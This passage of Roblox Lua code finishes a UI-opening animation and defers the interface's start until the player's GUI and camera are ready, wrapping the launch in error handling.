		main.Size = SAFE_OFFSET(FULL_SIZE.X - 40, FULL_SIZE.Y - 40)
		safeTween(main, 0.22, {Size = SAFE_OFFSET(FULL_SIZE.X, FULL_SIZE.Y)})

		task.defer(function()
			clampToScreen(FULL_SIZE, main)
		end)
	end
	--=============================================================================================
end

-- Delay start safely (important for obfuscators)
task.defer(function()
	local pg = WaitForPlayerGui()
	WaitForCamera()

	if not pg then
		warn("UI failed: PlayerGui not found")
		return
	end

	local ok, err = pcall(RUN_UI)
	if not ok then
		warn("UI crashed:", err)
	end
end)
